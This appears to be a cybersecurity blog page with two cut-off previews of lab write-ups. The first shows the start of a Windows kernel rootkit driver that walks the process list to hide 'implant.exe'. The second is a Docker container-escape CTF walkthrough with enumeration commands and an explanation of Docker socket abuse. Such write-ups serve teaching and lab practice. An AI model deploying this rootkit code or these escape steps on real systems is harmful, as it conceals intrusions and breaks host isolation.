CyberSec_Blog

  1. Script Explanation (rootkit.c) Script : #include <ntddk.h> // Offsets for Windows 10 x64 (Version 19041 - THM Lab) #define LINKS_OFFSET 0x2e8 // ActiveProcessLinks #define NAME_OFFSET 0x450 // ImageFileName void DriverUnload(PDRIVER_OBJECT DriverObject) { UNREFERENCED_PARAMETER(DriverObject); DbgPrint("Driver Unloaded. Note: Hidden processes remain hidden!\n"); } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(RegistryPath); // Start iterating from the System process PEPROCESS CurrentProcess = PsInitialSystemProcess; PLIST_ENTRY CurrentListEntry; char* imageName; BOOLEAN found = FALSE; DbgPrint("Searching for implant.exe to hide it...\n"); // Loop through the process list (limit to 1000 to avoid hangs) for (int i = 0; i < 1000; i++) {     imageName = (char*)CurrentProcess + NAME_OFFSET;     // Check if this is our target process     if (strstr(i...

  Full Walkthrough — Matryoshka Containment Unit Matryoshka Containment Unit is a Docker/container escape challenge that teaches: Docker socket abuse Privileged container escalation Shared volume abuse Remote code execution between containers Namespace escape to the host system Below is the complete attack chain from the first flag to the host flag. 1. Initial Enumeration You started inside the level1 container and performed basic Linux/container enumeration. Commands: ls -la cat /proc/1/cgroup find / -perm -4000 2 >/dev/null find / -name docker.sock 2 >/dev/null What you discovered .dockerenv This indicated you were inside a Docker container. /var/run/docker.sock This was the key vulnerability. Docker socket exposure means: the container can communicate directly with the Docker daemon running on the host anyone with access to the socket can effectively control Docker on the host machine This is one of the most dangerous Docker misconfigurations. 2. V...